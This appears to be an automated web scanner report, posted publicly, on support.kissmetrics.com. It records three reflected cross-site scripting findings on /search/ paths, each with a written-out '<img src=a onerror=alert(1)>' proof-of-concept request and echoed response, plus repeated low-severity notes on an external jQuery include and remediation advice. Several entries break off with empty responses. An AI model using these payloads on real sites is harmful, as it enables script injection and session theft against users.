XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, support.kissmetrics.com

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://support.kissmetrics.com/search/a [REST URL parameter 2] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/search/a

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 17667<img%20src%3da%20onerror%3dalert(1)>c58614c2258 was submitted in the REST URL parameter 2. This input was echoed as 17667<img src=a onerror=alert(1)>c58614c2258 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/a17667<img%20src%3da%20onerror%3dalert(1)>c58614c2258 HTTP/1.1
Host: support.kissmetrics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://support.kissmetrics.com/search/cookie9d6c0%3Cimg%20src%3da%20onerror%3dalert(%22XSS%22)%3E865391eff4b

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:50:01 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 7022
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
<h2>
Found
0
result(s) for '
a17667<img src=a onerror=alert(1)>c58614c2258
'
</h2>
...[SNIP]...

1.2. http://support.kissmetrics.com/search/cookie [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/search/cookie

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9d6c0<img%20src%3da%20onerror%3dalert(1)>865391eff4b was submitted in the REST URL parameter 2. This input was echoed as 9d6c0<img src=a onerror=alert(1)>865391eff4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/cookie9d6c0<img%20src%3da%20onerror%3dalert(1)>865391eff4b HTTP/1.1
Host: support.kissmetrics.com
Proxy-Connection: keep-alive
Referer: http://support.kissmetrics.com/search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km_ai=Dh3cuYrwfedK4cn76jFetAXOg8o%3D; __utma=13310637.1247803125.1314556126.1314556126.1314556126.1; __utmz=13310637.1314556126.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=KISSmetrics; km_lv=1314556184; km_uq=; km_vs=1; km_lv=x; km_uq=

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:42:47 GMT
Server: nginx
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 7037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
<h2>
Found
0
result(s) for '
cookie9d6c0<img src=a onerror=alert(1)>865391eff4b
'
</h2>
...[SNIP]...

1.3. http://support.kissmetrics.com/search/xss [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/search/xss

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e67be<img%20src%3da%20onerror%3dalert(1)>654b6e1975c was submitted in the REST URL parameter 2. This input was echoed as e67be<img src=a onerror=alert(1)>654b6e1975c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/xsse67be<img%20src%3da%20onerror%3dalert(1)>654b6e1975c HTTP/1.1
Host: support.kissmetrics.com
Proxy-Connection: keep-alive
Referer: http://support.kissmetrics.com/overview/how-is-kissmetrics-different
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km_ai=Dh3cuYrwfedK4cn76jFetAXOg8o%3D; __utma=13310637.1247803125.1314556126.1314556126.1314556126.1; __utmz=13310637.1314556126.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=KISSmetrics; km_lv=1314556184; km_uq=; km_vs=1; km_lv=x; km_uq=

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:42:33 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 7028
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
<h2>
Found
0
result(s) for '
xsse67be<img src=a onerror=alert(1)>654b6e1975c
'
</h2>
...[SNIP]...

2. Cross-domain script include previous next
There are 18 instances of this issue:

/
/advanced/a-b-testing
/advanced/server-client-side-integration
/apis
/apis/common-methods
/apis/javascript
/apis/url
/getting-started/people-events-properties
/getting-started/products-reports
/getting-started/saas_basics
/misc/api-key
/misc/javascript-settings
/misc/site-settings
/misc/user-privacy
/overview/how-is-kissmetrics-different
/search/a
/search/cookie
/search/xss

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

2.1. http://support.kissmetrics.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET / HTTP/1.1
Host: support.kissmetrics.com
Proxy-Connection: keep-alive
Referer: http://www.kissmetrics.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km_ai=Dh3cuYrwfedK4cn76jFetAXOg8o%3D; km_vs=1; km_lv=1314556166; km_uq=; __utma=13310637.1247803125.1314556126.1314556126.1314556126.1; __utmb=13310637.3.10.1314556126; __utmc=13310637; __utmz=13310637.1314556126.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=KISSmetrics

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 18:30:23 GMT
Last-Modified: Fri, 26 Aug 2011 22:46:17 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 10133
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
</div>
<script charset='utf-8' src='//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js' type='text/javascript'></script>
...[SNIP]...

2.2. http://support.kissmetrics.com/advanced/a-b-testing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/advanced/a-b-testing

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /advanced/a-b-testing HTTP/1.1
Host: support.kissmetrics.com
Proxy-Connection: keep-alive
Referer: http://support.kissmetrics.com/apis/javascript
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km_ai=Dh3cuYrwfedK4cn76jFetAXOg8o%3D; __utma=13310637.1247803125.1314556126.1314556126.1314556126.1; __utmz=13310637.1314556126.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=KISSmetrics; km_lv=1314556184; km_uq=; km_vs=1; km_lv=x; km_uq=

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:40:20 GMT
Last-Modified: Sat, 27 Aug 2011 00:00:37 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 10539
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
</div>
<script charset='utf-8' src='//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js' type='text/javascript'></script>
...[SNIP]...

2.3. http://support.kissmetrics.com/advanced/server-client-side-integration previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/advanced/server-client-side-integration

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /advanced/server-client-side-integration HTTP/1.1
Host: support.kissmetrics.com
Proxy-Connection: keep-alive
Referer: http://support.kissmetrics.com/search/cookie
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km_ai=Dh3cuYrwfedK4cn76jFetAXOg8o%3D; __utma=13310637.1247803125.1314556126.1314556126.1314556126.1; __utmz=13310637.1314556126.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=KISSmetrics; km_lv=1314556184; km_uq=; km_vs=1; km_lv=x; km_uq=

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:39:59 GMT
Last-Modified: Sat, 27 Aug 2011 17:25:19 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 8273
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
</div>
<script charset='utf-8' src='//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js' type='text/javascript'></script>
...[SNIP]...

2.4. http://support.kissmetrics.com/apis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/apis

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /apis HTTP/1.1
Host: support.kissmetrics.com
Proxy-Connection: keep-alive
Referer: http://support.kissmetrics.com/misc/api-key
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km_ai=Dh3cuYrwfedK4cn76jFetAXOg8o%3D; __utma=13310637.1247803125.1314556126.1314556126.1314556126.1; __utmz=13310637.1314556126.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=KISSmetrics; km_lv=1314556184; km_uq=; km_vs=1; km_lv=x; km_uq=

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:41:01 GMT
Last-Modified: Sat, 27 Aug 2011 01:52:58 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 11348
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
</div>
<script charset='utf-8' src='//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js' type='text/javascript'></script>
...[SNIP]...

2.5. http://support.kissmetrics.com/apis/common-methods previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/apis/common-methods

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /apis/common-methods HTTP/1.1
Host: support.kissmetrics.com
Proxy-Connection: keep-alive
Referer: http://support.kissmetrics.com/apis
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km_ai=Dh3cuYrwfedK4cn76jFetAXOg8o%3D; __utma=13310637.1247803125.1314556126.1314556126.1314556126.1; __utmz=13310637.1314556126.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=KISSmetrics; km_lv=1314556184; km_uq=; km_vs=1; km_lv=x; km_uq=

Response

2.6. http://support.kissmetrics.com/apis/javascript previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/apis/javascript

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /apis/javascript HTTP/1.1
Host: support.kissmetrics.com
Proxy-Connection: keep-alive
Referer: http://support.kissmetrics.com/advanced/server-client-side-integration
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km_ai=Dh3cuYrwfedK4cn76jFetAXOg8o%3D; __utma=13310637.1247803125.1314556126.1314556126.1314556126.1; __utmz=13310637.1314556126.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=KISSmetrics; km_lv=1314556184; km_uq=; km_vs=1; km_lv=x; km_uq=

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:40:08 GMT
Last-Modified: Fri, 26 Aug 2011 22:36:27 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 8199
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
</div>
<script charset='utf-8' src='//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js' type='text/javascript'></script>
...[SNIP]...

2.7. http://support.kissmetrics.com/apis/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/apis/url

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /apis/url HTTP/1.1
Host: support.kissmetrics.com
Proxy-Connection: keep-alive
Referer: http://support.kissmetrics.com/getting-started/people-events-properties
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km_ai=Dh3cuYrwfedK4cn76jFetAXOg8o%3D; __utma=13310637.1247803125.1314556126.1314556126.1314556126.1; __utmz=13310637.1314556126.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=KISSmetrics; km_lv=1314556184; km_uq=; km_vs=1; km_lv=x; km_uq=1314564072%20%2Fs%3Freturning%3D1%26_k%3D1c0dbdf3517e39a1141f7bc1e2e34a37cc92e647%26_p%3DDh3cuYrwfedK4cn76jFetAXOg8o%253D%26_t%3D1314564072%7C1314564072%20%2Fe%3F_n%3DDouble%2520Wildcard%2520Test%26_k%3D1c0dbdf3517e39a1141f7bc1e2e34a37cc92e647%26_p%3DDh3cuYrwfedK4cn76jFetAXOg8o%253D%26_t%3D1314564072%7C1314564072%20%2Fe%3F_n%3DTriple%2520Wildcard%2520Test%26_k%3D1c0dbdf3517e39a1141f7bc1e2e34a37cc92e647%26_p%3DDh3cuYrwfedK4cn76jFetAXOg8o%253D%26_t%3D1314564072

Response

2.8. http://support.kissmetrics.com/getting-started/people-events-properties previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/getting-started/people-events-properties

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /getting-started/people-events-properties HTTP/1.1
Host: support.kissmetrics.com
Proxy-Connection: keep-alive
Referer: http://support.kissmetrics.com/apis/common-methods
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km_ai=Dh3cuYrwfedK4cn76jFetAXOg8o%3D; __utma=13310637.1247803125.1314556126.1314556126.1314556126.1; __utmz=13310637.1314556126.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=KISSmetrics; km_lv=1314556184; km_uq=; km_vs=1; km_lv=x; km_uq=

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:41:18 GMT
Last-Modified: Sat, 27 Aug 2011 02:09:54 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 13923
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
</div>
<script charset='utf-8' src='//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js' type='text/javascript'></script>
...[SNIP]...

2.9. http://support.kissmetrics.com/getting-started/products-reports previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/getting-started/products-reports

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /getting-started/products-reports HTTP/1.1
Host: support.kissmetrics.com
Proxy-Connection: keep-alive
Referer: http://support.kissmetrics.com/getting-started/saas_basics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km_ai=Dh3cuYrwfedK4cn76jFetAXOg8o%3D; __utma=13310637.1247803125.1314556126.1314556126.1314556126.1; __utmz=13310637.1314556126.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=KISSmetrics; km_lv=1314556184; km_uq=; km_vs=1; km_lv=x; km_uq=1314564028%20%2Fs%3Freturning%3D1%26_k%3D1c0dbdf3517e39a1141f7bc1e2e34a37cc92e647%26_p%3DDh3cuYrwfedK4cn76jFetAXOg8o%253D%26_t%3D1314564028%7C1314564028%20%2Fe%3F_n%3DDouble%2520Wildcard%2520Test%26_k%3D1c0dbdf3517e39a1141f7bc1e2e34a37cc92e647%26_p%3DDh3cuYrwfedK4cn76jFetAXOg8o%253D%26_t%3D1314564028%7C1314564028%20%2Fe%3F_n%3DTriple%2520Wildcard%2520Test%26_k%3D1c0dbdf3517e39a1141f7bc1e2e34a37cc92e647%26_p%3DDh3cuYrwfedK4cn76jFetAXOg8o%253D%26_t%3D1314564028

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:40:41 GMT
Last-Modified: Sat, 27 Aug 2011 01:49:14 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 8059
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
</div>
<script charset='utf-8' src='//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js' type='text/javascript'></script>
...[SNIP]...

2.10. http://support.kissmetrics.com/getting-started/saas_basics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/getting-started/saas_basics

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /getting-started/saas_basics HTTP/1.1
Host: support.kissmetrics.com
Proxy-Connection: keep-alive
Referer: http://support.kissmetrics.com/advanced/a-b-testing
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km_ai=Dh3cuYrwfedK4cn76jFetAXOg8o%3D; __utma=13310637.1247803125.1314556126.1314556126.1314556126.1; __utmz=13310637.1314556126.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=KISSmetrics; km_lv=1314556184; km_uq=; km_vs=1; km_lv=x; km_uq=

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:40:36 GMT
Last-Modified: Sat, 27 Aug 2011 17:09:17 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 12294
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
</div>
<script charset='utf-8' src='//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js' type='text/javascript'></script>
...[SNIP]...

2.11. http://support.kissmetrics.com/misc/api-key previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/misc/api-key

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /misc/api-key HTTP/1.1
Host: support.kissmetrics.com
Proxy-Connection: keep-alive
Referer: http://support.kissmetrics.com/getting-started/products-reports
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km_ai=Dh3cuYrwfedK4cn76jFetAXOg8o%3D; __utma=13310637.1247803125.1314556126.1314556126.1314556126.1; __utmz=13310637.1314556126.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=KISSmetrics; km_lv=1314556184; km_uq=; km_vs=1; km_lv=x; km_uq=

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:40:56 GMT
Last-Modified: Sun, 28 Aug 2011 00:15:31 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 7132
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
</div>
<script charset='utf-8' src='//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js' type='text/javascript'></script>
...[SNIP]...

2.12. http://support.kissmetrics.com/misc/javascript-settings previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/misc/javascript-settings

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /misc/javascript-settings HTTP/1.1
Host: support.kissmetrics.com
Proxy-Connection: keep-alive
Referer: http://support.kissmetrics.com/misc/user-privacy
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
